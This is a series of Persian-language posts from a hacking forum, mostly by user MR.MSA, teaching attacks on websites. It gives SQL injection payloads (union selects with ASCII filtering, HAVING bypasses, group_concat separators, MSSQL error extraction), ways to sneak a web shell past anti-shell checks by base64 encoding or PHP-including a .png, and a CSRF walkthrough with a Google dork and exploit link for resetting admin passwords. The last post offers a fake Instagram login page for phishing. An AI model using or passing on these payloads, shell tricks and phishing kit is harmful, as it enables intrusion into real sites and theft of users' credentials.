    برای پیدا کردن نوع دیتابیس یک سایت می توانید از افزونه های Wappalyzer و WgatRuns که در سایت هم معرفی شده استفاده کنید . در بعضی تارگت ها نمی توانید از این ها استفاده کنید و آن موقع است که از key word ها استفاده می کنیم و فقط باید یک key word را در کنار ادرس سایت قرار دهیم اگر سایت بدون هیچ مشکلی لود شد یعنی از همان دیتابیس استفاده می کند . مثال : site.com/news.php?id=1(key word) (در فایل KeyWords.txt می توانید key word های هر دیتابیس را مشاهده کنید و از آنها استفاده کنید . ) KeyWords.txt
  18. با سلام خدمت کاربران و مدیران عزیز گارد ایران توضیح مختصر در رابطه با جداول (table) تیبل های سیستمی : تیبل هایی که بیشتر مواقع با حروف بزرگ هستند و زیاد به کار ما نمیان . تیبل های user یا کاربری : تیبل هایی که ما با آنها کار داریم و بیشتر مواقع با حروف کوچک هستند . ما قبلا برای محدود سازی از این روش استفاده می کردیم : Site.com/news.php?id=39+union+select+1,2,3,4,5+from+information_schema.tables+where+table_schema=database()-- و حالا در محدود سازی که می خواهم به شما آموزش دهم url به این طریق می شود : Site.com/news.php?id=39+union+select+1,2,3,4,5+from+information_schema.tables+where+ascii(substring((table_name),1,1))>97-- و دارید می گویید که تمام تیبل هایی را که حرف های شان از عدد 97 (a) بیشتر است نمایش بده که اعداد بیشتر از 97 در کدگذاری ascii حروف کوچک هستند. برای اینکه بگویید تیبل هایی که حرف دوم آن ها کوچک است را برسی کند : Site.com/news.php?id=39+union+select+1,2,3,4,5+from+information_schema.tables+where+ascii(substring((table_name),2,1))>97-- نکته : در این روش از کدگذاری ascii استفاده شده که عدد 97 به معنای a کوچک است . امیدوارم لذت برده باشید تشکر فراموش نشه 😅
  19. MR.MSA

    متد Having

    بایپس نشان ندادن ستون آسیب پذیر اگر بایپس هایی مثل null کردن را انجام دادید و نتیجه نداد باید از Having استفاده کنید . نوع having ها : Having null Having false Having 0 Having 1 like 0 Having 1 limit 0 به این صورت : ......?id=1+<having>+union+select+1,2,3,4,5,6,7,8,9 در جایی که نوشته شده <having> باید نوع having را بنویسید . مثال : .....?id=2 having null+union+select+1,2,3,4,5,6,7,8,9-- تمام having ها را انجام دهید تا به نتیجه برسید . امیدوارم لذت برده باشید . 💙 فراموش نشه 😍
  20. MR.MSA

    بایپس آنتی شل

    با سلام خدمت کاربران و مدیران سایت گارد ایران در این تاپیک قصد دارم به شما آموزش دور زدن آنتی شل رو بدم که شاید بیشتر جاها بدردتون بخوره . روش اول : دو بار encode کردن شل با base64 که می توانید از این سایت کمک بگیرید . --------------- روش دوم : شل رو به فرمت png تغییر دهید . یک فایل دیگر با فرمت php بسازید و این کد رو در اون قرار دهید : <?php include_once("shell.png"); ?> تا سایت اون فایل رو با فرمت php بخونه . --------------- پیشنهاد می کنم هر دو روش رو در کنار هم انجام دهید تا انتی شلر بهتر بایپس شود . امیدوارم از این تاپیک لذت برده باشید و بدردتون بخوره و تاپیک خوبی رو گذاشته باشم .
  21. با سلام من قصد دارم در این تاپیک با شما آموزش باگ sql injection در سایت ها asp رو بدم . سطح : متوسط تفاوت mssqli و mysql : Mssql توسط شرکت مایکروسافت درست شده و با قیمت بالایی فروخته می شود و امکانات بیشتری دارد و برای هاست های ویندوز هم هست . Mysql اپن سورس و رایگان است و برای لینوکس است و قابلیت اجرا بر روی ویندوز هم دارد . ------------------------------------------------------------------------------------------------------------------------ تست آسیب پذیری ‌: به ادرس سایت ‘a را اضافه کنید . به این صورت : Site.com/news.aspx?id=4’a و با دریافت خطا یعنی سایت اسیب پذیر است . ------------------------------------------------------------------------------------------------------------------------ بیرون کشیدن اطلاعات اولیه : روش اول : Site.com/news.aspx?id=4+and+1=(convert(int,x)) روش دوم : Site.com/news.aspx?id=4+or+1=(convert(int,x)) و به جای x می توانید این مقادیر بزنید ‌: user db_name @@servername @@version Host_@@version Host_name و.... ------------------------------------------------------------------------------------------------------------------------ برای طولانی نشدن پست ادامه رو در پست های دیگر می گذارم فعلا با مقدمه آشنا بشوید . امیدوارم مورد تایید شما قرار گرفته باشه و پست خوبی رو گذاشته باشم .
  22. با سلام خدمت کاربران و مدیران گارد ایران در این پست قصد دارم یک سایت برای ساخت اپلیکیشن وب را به شما معرفی کنم . سایت : appyet.com نکاته قابل توجه : برنامه ها فقط برای اندروید هستند . ویژگی های زیادی دارد . دوستان توجه داشته باشید که اگر دوستی از این سایت استفاده کرد و به مشکل امنیتی برخورد حتما اطلاع دهند تا بقیه کاربران آگاه باشند .
  23. با سلام خدمت دوستان و مدیران عزیز سایت GUARDIRAN در این پست قصد دارم به شما آموزش متد separator رو یدم ، در آموزش متد join اگر یادتون باشه نامی از متد separator رو بردم امروز گفتم شاید مبدتی ها با این متد آشنایی نباشند و آموزشش رو بدم . متد separator‌ : در زمان مرتب سازی تیبل ها ، ستون ها و یوزرنیم و پسورد ها شما میاید از کاما برای گذاشتن تگ br (به صورت hex) استفاده می کنید : ..........(group_concat(table_name,0x3c62723e...... حالا شاید در بعضی تارگت ها سایت به کاما حساس باشد در اینجا است که باید از متد separator استفاده کنید ، به این صورت : .......( group_concat((table_name)separator 0x3c62723e...... زیاد پست رو طولانی نمی کنم و گفتم متد ساده ای هست نیاز به توضیحات ندارد . ممنون که وقت گذاشتید و این تاپیک رو تا آخر خواندید .
  24. MR.MSA

    اکسپلویت باگ CSRF

    با سلام خدمت دوستان عزیز گارد ایران من MR.MSA در این تاپیک قصد دارم یک اکسپلویت در باگ CSRF رو به شما معرفی کنم و کمی توضیح درباره این باگ برای مبتدی ها ، با من همراه باشید . -------------------- CSRF : Cross Site Request Forgery نکات باگ : معنی شده آن جعل درخواست است . این باگ را کرم تحت وب می شناسند و اثر بدی دارد . این باگ توسط سایت و فایروال شناسایی نمی شود . -------------------- نحوه حمله : این حمله به طوری است که ما با استفاده از جعل کوکی admin سایت می توانیم درخواست های جعلی بدهیم . -------------------- انجام حمله : قدم اول : گوگل دورک Google Dork : inurl:admin/admin.php Travel PORTAL ---------- قدم دوم : اکسپلویت به این ادرس بروید و اکسپلویت رو با پسوند html ذخیره کنید . exploit : https://www.exploit-db.com/exploits/15280 ---------- قدم سوم : به جای http://VICTIM/admin/admin.php آدرس سایت خود را بزنید => http://guardiran.org/admin/admin.php قدم چهارم : رمز جدید خود را بزنید . ----------------------------- امید وارم از این تاپیک لذت برده باشید و اکسپلویت مورد تایید شما قرار گرفته باشه . اگه مشکلی داشت به خوبی خودتون ببخشید سعی کردم تاپیک رو جوری بنویسم که همه بتوانند استفاده کنند . ******************** MR.MSA ***************** <------------------------MR.MSA----------------------> -------- پیج فیک ------- <صفحه لاگین اینستاگرام (فیک)> ------- باگ -------- <آموزش متد polygon در sql injection > <آموزش متد join در sql injection > <نکته مهم در متد join > ------- افزونه -------- <افزونه Wapplyzer (اسکنر سایت ) > <افزونه اسکن سایت های wordpress> <افزونه whatruns (جمع آوری اطلاعات سایت)> <------------------------MR.MSA----------------------/>
  25. MR.MSA

    پیج فیک اینستاگرام

    با سلام خدمت تمام کاربران و مدیران GUARDIRAN در این تاپیک قصد دارم یک پیج فیک اینستاگرام رو به شما دوستان عزیز بدم . فقط دوستان توجه داشته باشید که باید هر چیزی که بین این کامنت هست رو حذف کنید : <!--***************************** MR.MSA *****************************--> برای دانلود به فایل پیوست مراجعه کنید . --------------------- امید وارم از این پست لذت برده باشید و از فیک پیج اینستاگرام استفاده کرده باشید . یه مشکلات ریز داشت یه خوبی خودتون ببخشید . ******************** MR.MSA ***************** Fake Page Instagram.zip